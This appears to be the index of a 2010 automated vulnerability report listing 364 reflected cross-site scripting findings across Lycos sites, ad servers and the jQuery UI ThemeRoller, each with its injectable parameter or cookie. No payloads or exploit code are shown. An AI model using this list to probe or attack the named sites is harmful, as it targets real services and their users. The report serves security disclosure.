Lycos.com, XSS, Cross Site Scripting, CAPEC-86, CWE-79

Loading

Proof of Concept, XSS, Example | Vulnerability Crawler

Report generated by XSS.CX at Sun Dec 12 09:23:00 CST 2010.


Lycos Web Properties Example Vulnerability Report

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/ad/cm.idg_b2c/ [REST URL parameter 1]

1.2. http://a.collective-media.net/ad/idgt.lycos/ [REST URL parameter 1]

1.3. http://a.collective-media.net/adj/cm.idg_b2c/ [REST URL parameter 2]

1.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]

1.5. http://a.collective-media.net/adj/cm.idg_b2c/ [sz parameter]

1.6. http://a.collective-media.net/adj/idgt.lycos/ [REST URL parameter 2]

1.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

1.8. http://a.collective-media.net/adj/idgt.lycos/ [tile parameter]

1.9. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 1]

1.10. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 2]

1.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]

1.12. http://a.collective-media.net/cmadj/idgt.lycos/ [tile parameter]

1.13. http://advertising.lycos.com/ [cat parameter]

1.14. http://advertising.lycos.com/ [tab parameter]

1.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]

1.16. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com [name of an arbitrarily supplied request parameter]

1.17. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [REST URL parameter 3]

1.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]

1.19. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [REST URL parameter 3]

1.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]

1.21. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [REST URL parameter 3]

1.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]

1.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]

1.24. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

1.25. http://dealnews.com/lw/artclick.html [REST URL parameter 1]

1.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]

1.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]

1.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]

1.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]

1.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]

1.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]

1.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]

1.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]

1.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]

1.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]

1.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]

1.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]

1.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]

1.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]

1.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]

1.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]

1.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]

1.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]

1.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]

1.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]

1.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]

1.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]

1.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]

1.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]

1.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]

1.51. http://ib.adnxs.com/ptj [redir parameter]

1.52. http://info.lycos.com/ [cat parameter]

1.53. http://info.lycos.com/ [tab parameter]

1.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]

1.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]

1.56. http://jobs.lycos.com/search [x parameter]

1.57. http://jqueryui.com/themeroller/ [bgColorActive parameter]

1.58. http://jqueryui.com/themeroller/ [bgColorContent parameter]

1.59. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

1.60. http://jqueryui.com/themeroller/ [bgColorError parameter]

1.61. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

1.62. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

1.63. http://jqueryui.com/themeroller/ [bgColorHover parameter]

1.64. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

1.65. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

1.66. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

1.67. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

1.68. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

1.69. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

1.70. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

1.71. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

1.72. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

1.73. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

1.74. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

1.75. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

1.76. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

1.77. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

1.78. http://jqueryui.com/themeroller/ [bgTextureError parameter]

1.79. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

1.80. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

1.81. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

1.82. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

1.83. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

1.84. http://jqueryui.com/themeroller/ [borderColorActive parameter]

1.85. http://jqueryui.com/themeroller/ [borderColorContent parameter]

1.86. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

1.87. http://jqueryui.com/themeroller/ [borderColorError parameter]

1.88. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

1.89. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

1.90. http://jqueryui.com/themeroller/ [borderColorHover parameter]

1.91. http://jqueryui.com/themeroller/ [cornerRadius parameter]

1.92. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

1.93. http://jqueryui.com/themeroller/ [fcActive parameter]

1.94. http://jqueryui.com/themeroller/ [fcContent parameter]

1.95. http://jqueryui.com/themeroller/ [fcDefault parameter]

1.96. http://jqueryui.com/themeroller/ [fcError parameter]

1.97. http://jqueryui.com/themeroller/ [fcHeader parameter]

1.98. http://jqueryui.com/themeroller/ [fcHighlight parameter]

1.99. http://jqueryui.com/themeroller/ [fcHover parameter]

1.100. http://jqueryui.com/themeroller/ [ffDefault parameter]

1.101. http://jqueryui.com/themeroller/ [fsDefault parameter]

1.102. http://jqueryui.com/themeroller/ [fwDefault parameter]

1.103. http://jqueryui.com/themeroller/ [iconColorActive parameter]

1.104. http://jqueryui.com/themeroller/ [iconColorContent parameter]

1.105. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

1.106. http://jqueryui.com/themeroller/ [iconColorError parameter]

1.107. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

1.108. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

1.109. http://jqueryui.com/themeroller/ [iconColorHover parameter]

1.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

1.111. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

1.112. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

1.113. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

1.114. http://jqueryui.com/themeroller/ [opacityShadow parameter]

1.115. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

1.116. http://k.collective-media.net/cmadj/cm.idg_b2c/ [REST URL parameter 2]

1.117. http://k.collective-media.net/cmadj/cm.idg_b2c/ [sz parameter]

1.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]

1.119. http://peoplesearch.lycos.com/ [search-type parameter]

1.120. http://peoplesearch.lycos.com/ [tab parameter]

1.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]

1.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]

1.123. http://search.lycos.com/ [cat parameter]

1.124. http://search.lycos.com/ [cat parameter]

1.125. http://search.lycos.com/ [mobile parameter]

1.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]

1.127. http://search.lycos.com/ [query parameter]

1.128. http://search.lycos.com/ [query parameter]

1.129. http://search.lycos.com/ [src parameter]

1.130. http://search.lycos.com/ [tab parameter]

1.131. http://search.lycos.com/ [x parameter]

1.132. http://search.lycos.com/ [y parameter]

1.133. http://search.lycos.com/image/ [cat parameter]

1.134. http://search.lycos.com/image/ [cat parameter]

1.135. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]

1.136. http://search.lycos.com/image/ [tab parameter]

1.137. http://search.lycos.com/video/ [cat parameter]

1.138. http://search.lycos.com/video/ [cat parameter]

1.139. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]

1.140. http://search.lycos.com/video/ [tab parameter]

1.141. http://advertising.lycos.com/ [diktfc cookie]

1.142. http://advertising.lycos.com/ [diktfc cookie]

1.143. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

1.144. http://advertising.lycos.com/bootstrap.js [diktfc cookie]

1.145. http://advertising.lycos.com/contactus.html [diktfc cookie]

1.146. http://advertising.lycos.com/contactus.html [diktfc cookie]

1.147. http://advertising.lycos.com/lycos.xml [diktfc cookie]

1.148. http://advertising.lycos.com/lycos.xml [diktfc cookie]

1.149. http://deals.lycos.com/ [diktfc cookie]

1.150. http://deals.lycos.com/ [diktfc cookie]

1.151. http://deals.lycos.com/bootstrap.js [diktfc cookie]

1.152. http://deals.lycos.com/bootstrap.js [diktfc cookie]

1.153. http://deals.lycos.com/coupons [diktfc cookie]

1.154. http://deals.lycos.com/coupons [diktfc cookie]

1.155. http://deals.lycos.com/coupons/stores [diktfc cookie]

1.156. http://deals.lycos.com/coupons/stores [diktfc cookie]

1.157. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

1.158. http://deals.lycos.com/deal/93-off-iphone-4-cases-at-hhi-extra-20-off-413441 [diktfc cookie]

1.159. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

1.160. http://deals.lycos.com/deal/canon-eos-60d-18mp-dslr-body-899-413793 [diktfc cookie]

1.161. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

1.162. http://deals.lycos.com/deal/casio-ex-fh20-9-1mp-digital-camera-for-200-414612 [diktfc cookie]

1.163. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

1.164. http://deals.lycos.com/deal/cut-the-rope-holiday-gift-for-iphone-for-free-414306 [diktfc cookie]

1.165. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

1.166. http://deals.lycos.com/deal/dell-core-2-duo-2-9ghz-pc-24-lcd-469-414699 [diktfc cookie]

1.167. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

1.168. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

1.169. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

1.170. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

1.171. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

1.172. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

1.173. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

1.174. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

1.175. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

1.176. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

1.177. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

1.178. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

1.179. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

1.180. http://deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616 [diktfc cookie]

1.181. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

1.182. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]

1.183. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

1.184. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]

1.185. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

1.186. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]

1.187. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

1.188. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]

1.189. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

1.190. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

1.191. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

1.192. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

1.193. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

1.194. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

1.195. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

1.196. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

1.197. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

1.198. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

1.199. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

1.200. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]

1.201. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

1.202. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]

1.203. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

1.204. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]

1.205. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

1.206. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]

1.207. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

1.208. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]

1.209. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

1.210. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

1.211. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

1.212. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

1.213. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

1.214. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

1.215. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

1.216. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

1.217. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

1.218. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

1.219. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

1.220. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

1.221. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

1.222. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]

1.223. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

1.224. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]

1.225. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

1.226. http://deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 [diktfc cookie]

1.227. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

1.228. http://deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 [diktfc cookie]

1.229. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

1.230. http://deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355 [diktfc cookie]

1.231. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

1.232. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

1.233. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

1.234. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

1.235. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

1.236. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

1.237. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

1.238. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

1.239. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

1.240. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

1.241. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

1.242. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

1.243. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

1.244. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

1.245. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

1.246. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

1.247. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

1.248. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

1.249. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

1.250. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

1.251. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

1.252. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

1.253. http://deals.lycos.com/deals [diktfc cookie]

1.254. http://deals.lycos.com/deals [diktfc cookie]

1.255. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

1.256. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

1.257. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

1.258. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

1.259. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

1.260. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

1.261. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

1.262. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

1.263. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

1.264. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]

1.265. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

1.266. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]

1.267. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

1.268. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]

1.269. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

1.270. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]

1.271. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

1.272. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]

1.273. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

1.274. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]

1.275. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

1.276. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]

1.277. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

1.278. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]

1.279. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

1.280. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]

1.281. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

1.282. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]

1.283. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

1.284. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]

1.285. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

1.286. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]

1.287. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

1.288. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]

1.289. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

1.290. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]

1.291. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

1.292. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]

1.293. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

1.294. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

1.295. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

1.296. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

1.297. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

1.298. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

1.299. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

1.300. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

1.301. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

1.302. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

1.303. http://deals.lycos.com/deals/stores [diktfc cookie]

1.304. http://deals.lycos.com/deals/stores [diktfc cookie]

1.305. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

1.306. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

1.307. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

1.308. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

1.309. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

1.310. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

1.311. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

1.312. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

1.313. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

1.314. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

1.315. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

1.316. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [diktfc cookie]

1.317. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

1.318. http://deals.lycos.com/deals/stores/jcpenney-320 [diktfc cookie]

1.319. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

1.320. http://deals.lycos.com/deals/stores/kohls-1009 [diktfc cookie]

1.321. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

1.322. http://deals.lycos.com/deals/stores/sony-style-716 [diktfc cookie]

1.323. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

1.324. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]

1.325. http://deals.lycos.com/search [diktfc cookie]

1.326. http://deals.lycos.com/search [diktfc cookie]

1.327. http://deals.lycos.com/sitemap [diktfc cookie]

1.328. http://deals.lycos.com/sitemap [diktfc cookie]

1.329. http://info.lycos.com/ [diktfc cookie]

1.330. http://info.lycos.com/ [diktfc cookie]

1.331. http://info.lycos.com/bootstrap.js [diktfc cookie]

1.332. http://info.lycos.com/bootstrap.js [diktfc cookie]

1.333. http://info.lycos.com/contact.php [diktfc cookie]

1.334. http://info.lycos.com/contact.php [diktfc cookie]

1.335. http://info.lycos.com/copyright.php [diktfc cookie]

1.336. http://info.lycos.com/copyright.php [diktfc cookie]

1.337. http://info.lycos.com/jobs.php [diktfc cookie]

1.338. http://info.lycos.com/jobs.php [diktfc cookie]

1.339. http://info.lycos.com/legal/legal.asp [diktfc cookie]

1.340. http://info.lycos.com/legal/legal.asp [diktfc cookie]

1.341. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

1.342. http://info.lycos.com/legal/sectoolbar.html [diktfc cookie]

1.343. http://info.lycos.com/life.php [diktfc cookie]

1.344. http://info.lycos.com/life.php [diktfc cookie]

1.345. http://info.lycos.com/overview.php [diktfc cookie]

1.346. http://info.lycos.com/overview.php [diktfc cookie]

1.347. http://info.lycos.com/privacy.php [diktfc cookie]

1.348. http://info.lycos.com/privacy.php [diktfc cookie]

1.349. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

1.350. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]

1.351. http://info.lycos.com/safety.php [diktfc cookie]

1.352. http://info.lycos.com/safety.php [diktfc cookie]

1.353. http://info.lycos.com/tos-mail.php [diktfc cookie]

1.354. http://info.lycos.com/tos-mail.php [diktfc cookie]

1.355. http://info.lycos.com/tos-po.php [diktfc cookie]

1.356. http://info.lycos.com/tos-po.php [diktfc cookie]

1.357. http://info.lycos.com/tos-subs.php [diktfc cookie]

1.358. http://info.lycos.com/tos-subs.php [diktfc cookie]

1.359. http://info.lycos.com/tos-tm.php [diktfc cookie]

1.360. http://info.lycos.com/tos-tm.php [diktfc cookie]

1.361. http://info.lycos.com/tos.php [diktfc cookie]

1.362. http://info.lycos.com/tos.php [diktfc cookie]

1.363. http://peoplesearch.lycos.com/ [diktfc cookie]

1.364. http://peoplesearch.lycos.com/ [diktfc cookie]

